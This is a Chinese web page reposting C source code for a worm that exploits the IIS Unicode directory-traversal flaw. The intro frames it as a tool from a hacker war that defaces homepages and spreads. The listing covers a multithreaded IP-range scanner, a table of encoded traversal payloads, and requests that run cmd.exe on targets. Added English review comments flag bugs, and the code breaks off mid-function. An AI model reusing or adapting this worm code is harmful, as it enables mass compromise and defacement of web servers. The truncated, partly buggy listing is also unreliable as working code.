
扫描UNICODE漏洞传播、攻击的蠕虫源代码

作者:佚名  来源:本站整理  发布时间:2009-03-16 20:26:54

在5.1期间的中美黑客战中,红客联盟攻击的网站中,WINDOWS+IIS+UNICODE漏洞主机占90%。(美国的poizenBOx同样是利用这个UNICODE漏洞攻击我国的主机)

详细请见http://www.cnhonker.com/whatnew/data/20010418/214346.htm

下面是我和zhaowuqing写的一个利用该漏洞的蠕虫程序。跟LION蠕虫有些相象,都需要把自己寄存到某个FTP主机上……

运行:直接运行(无参数)将扫描本机IP开始的100个主机,并修改首页、传播

带参数运行 :iis 202.97.233.0 202.97.233.254  这将扫描该IP段的主机并实施攻击。(注意:起始和结束两个IP参数必须同时给出;只给一个参数时程序会把空指针 argv[2] 传给 inet_addr,行为未定义。)

下面贴源代码。说明:(1) 本页转载时原代码中的 `//` 注释被显示成了 `file://`,阅读时应当作 `//`;(2) 本页贴出的源码在 FindExeDir 函数中间被截断,修改首页和传播的部分并未包含在内;(3) 此代码针对的是 2001 年前后 Windows+IIS 的 Unicode 目录穿越漏洞(见上文链接日期),仅供安全分析研究。

// Don't forget to link with wsock32.lib :-o
#include <windows.h>
#include <stdio.h>

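// Global state shared between main() and the scanner threads.
int num=0;               // index into hole[] used by FindExeDir; never changed in the visible part of the listing
int ExeDirNum=0;         // unused in the visible part of the listing
HANDLE hSemaphore=NULL;  // counting semaphore that bounds the number of live scanner threads
int MaxThread=100;       // initial/maximum semaphore count: at most 100 scanner threads at once
                         // (was declared without a type; implicit int is invalid since C99)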
// 下面定义漏洞数组(各种编码形式的 "/" 与 "\",用于目录穿越)
// Path fragments that, placed after a mapped virtual directory, are meant to escape the
// web root.  Each entry is an alternative encoding of "/" or "\" (some with "../.."
// repeats built in).  FindExeDir prepends ".." and repeats hole[num] eight times to
// build "/<dir>/<fragments>/winnt/system32/cmd.exe?/c%20dir".  Only hole[num] is ever
// read, and num is never changed from 0 in the visible part of the listing, so as
// written only the first entry is tried.
// NOTE(review): the table contains verbatim duplicates (entry 5 == entry 1; the
// "%e0%80%af../..", "%e0%80%af.." and "%c1%1c../.." lines each appear twice) and four
// entries ("%c1%pc", "%c0%9v", "%c0%qf", "%c1%8s") contain non-hexadecimal characters
// and are therefore not well-formed percent-escapes; what a target made of them is not
// established by this listing.
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};

// 下面是 7 个可能带有可执行映射的虚拟目录;可以自行增加,但数组长度 [7] 和引用该数组的 for 循环上限必须同步修改
// Virtual directories probed for an executable mapping (indexed by exenum in FindExeDir).
// The explicit [7] must be kept in step with the loop bound of whatever code walks this
// table; that loop is not in the visible part of the listing.
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};

// 函数声明
// Forward declarations.
long GetLocalIP(void);// local host's IPv4 address as inet_addr() yields it (network byte order); 0 on failure
DWORD WINAPI FindExeDir(LPVOID lp);// scanner thread body; lp carries the target host address as an integer
char *GetData(int SockFD);// read the reply to what was sent on SockFD (definition not in the visible listing)
char * find(const char*pszSource,const char * pszKey);// locate pszKey inside pszSource (definition not in the visible listing)

char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径

// 程序入口

// Entry point.  With no arguments: scan 100 addresses derived from the local host's
// own address and repeat forever (the mode used once the program runs on a compromised
// host).  With arguments, "iis <start-ip> <end-ip>": scan that range once.
// Each address gets its own FindExeDir() thread; hSemaphore (initial count MaxThread)
// bounds how many are alive at once and is used afterwards to detect that all finished.
int main(int argc, char **argv)
{
 HANDLE hThread=NULL;
 DWORD dwThreadID;
    long PreviousCount;
 int i;
 int StartNet;
 int StopNet;
 int StartHost;// first host of the range (host byte order)
 int StopHost;// last host of the range (host byte order)
 
 WSADATA wsaData;
 struct in_addr host;// NOTE(review): written once below and never read
 
 WSAStartup(0x202, &wsaData );
 if(argc<2)// no arguments: scan "the 100 hosts after" the local IP
 {
  StartNet=GetLocalIP();
  // NOTE(review): GetLocalIP() returns the address in network byte order, so on a
  // little-endian host "+100" changes the FIRST octet, not the last; the range
  // scanned is not the 100 addresses following the local one.
  StopNet=GetLocalIP()+100;
 }
 else// arguments given, e.g. "iis 202.97.56.3 202.97.56.254": scan that range
 {
  StartNet=inet_addr(argv[1]);
  // NOTE(review): with exactly one argument argv[2] is NULL here; inet_addr(NULL)
  // is undefined behavior.
  StopNet=inet_addr(argv[2]);
 }
 // Convert to host order so the range can be walked with ++.  Both ends live in an
 // int, so addresses above 127.255.255.255 come out negative; the loop below still
 // works as long as both ends fall on the same side of that boundary.
 StartHost=ntohl(StartNet);
 StopHost=ntohl(StopNet);
 WSACleanup();
    do
 {
  
  // NOTE(review): when argc<2 argv[1] is NULL, so this calls inet_addr(NULL)
  // (undefined behavior); the value stored in host is never used.
  host.S_un.S_addr = inet_addr(argv[1]);
  WSAStartup(0x202, &wsaData );
  
  // One semaphore slot per scanner thread that may run at the same time.
  hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
  if(hSemaphore==NULL)
  {
   
   printf("CreateSemaphore failed:%d",GetLastError());
   // NOTE(review): "file://" is a mangled "//" from the page conversion: the next
   // line is a commented-out __leave, so on failure execution falls through with
   // hSemaphore still NULL.
   file://__leave;
  }
  
  for(i=StartHost;i<=StopHost;i++)
  {
   // The host number travels through the LPVOID thread parameter as an integer;
   // FindExeDir casts it back.
   hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
   if(hThread==NULL)
    
   {
    printf("Create thread failed:%d",GetLastError());
    break;
   }
   printf(".");
   Sleep(10);
   CloseHandle(hThread);
   // Take one slot per thread started; blocks once MaxThread threads are alive.
   // Each thread is presumably expected to release its slot when it exits -- that
   // code is not in the visible part of the listing.
   WaitForSingleObject(hSemaphore,INFINITE);
  }
  // Wait until every slot is free again: after our own Wait, a previous count of
  // MaxThread-1 means no scanner thread still holds one.
  while(1)
  {
   WaitForSingleObject(hSemaphore,INFINITE);
   if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
   {
    printf("main() ReleaseSemaphore failed:%d",GetLastError());
    Sleep(5000);
    break;
   }
   if(PreviousCount==(MaxThread-1))
   {
    printf("All done.");
    break;
   }
   Sleep(500);
  }
  
  // NOTE(review): exedir and localpath stay NULL unless a scanner thread set them
  // (those assignments are not in the visible listing); passing NULL to %s is
  // undefined behavior.
  printf("发现可执行目录. [%s]", exedir);
  printf("可执行目录是 [%s]",localpath);
  
  
  CloseHandle(hSemaphore);
  
  WSACleanup();
  
  
 }
    while(argc<2);// no arguments means we run on an already-compromised host: loop forever
 
 return 0;
}

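// Returns the local host's IPv4 address in the form inet_addr() yields (network byte
// order), or 0 on failure.  As in the original, the host name and every address
// gethostbyname() reports are printed, and of several addresses the LAST is returned.
// Fixes: a failed gethostname() is no longer followed by a lookup of an uninitialised
// buffer, and an empty address list no longer indexes h_addr_list[-1].
long GetLocalIP(void)
{
 char  szName[128];
 int i;
 PHOSTENT pHost;
 struct in_addr last;

 if(gethostname(szName, sizeof szName)!=0)// failed: szName would be garbage
  return 0;
 printf("%s",szName);
 pHost = gethostbyname(szName);
 if( NULL == pHost )// failed
  return 0;
 for(i=0;pHost->h_addr_list[i]!=NULL;i++)
  printf("%s",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
 if(i==0)// no address at all; the original read h_addr_list[-1] here
  return 0;
 last=*((struct in_addr *)pHost->h_addr_list[i-1]);
 // inet_ntoa/inet_addr round trip kept so the returned value matches the original.
 return inet_addr(inet_ntoa(last));
}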


DWORD WINAPI FindExeDir(LPVOID lp)
{
 int host=(int)lp;
 u_short port=80;
 int SockFD,i;
 struct sockaddr_in DstSAin;
 char waste[500],uniwaste[500];
 char *buffer,*p;
 char space[3];
 char dletter[2];//磁盘路径
 char asc[3];
 int rbytes=0,loc1=0,loc2=0;
 char locdir[300];
 int exenum=0;
crack: 
 memset(locdir,0,300);
 memset(uniwaste,0,499);
 memset(space,0,3);
 strcpy(space,"%20");
 memset(asc,0,3);
 strcpy(asc,"%3E");
 printf("查找漏洞%d...",host);
 
 for(i=0;i<8;i++)
 {
  strcat(uniwaste,"..");
  strcat(uniwaste,hole[num]); file://把unicode码和URL结合起来.
 }
 
 memset(waste,0,500);
 file://create our string that sees if we can execute cmd.exe
 file://that way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0",ExeDirs[exenum],uniwaste,space);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
  printf("Trying directory [%s]", waste);
  send(SockFD,waste,strlen(waste),0); file://try one of the directories
  buffer=GetData(SockFD);
  p=strstr(buffer,"Directory of"); file://找到了cmd.exe的目录!!!
  if(p!=NULL)
  {
   
   loc1=p-buffer+1;
   p=strstr(buffer,"<DIR>");
   if(p!=NULL)
   {
    loc2=p-buffer+1;
    loc2=loc2-27;
    buffer[loc2-2]='
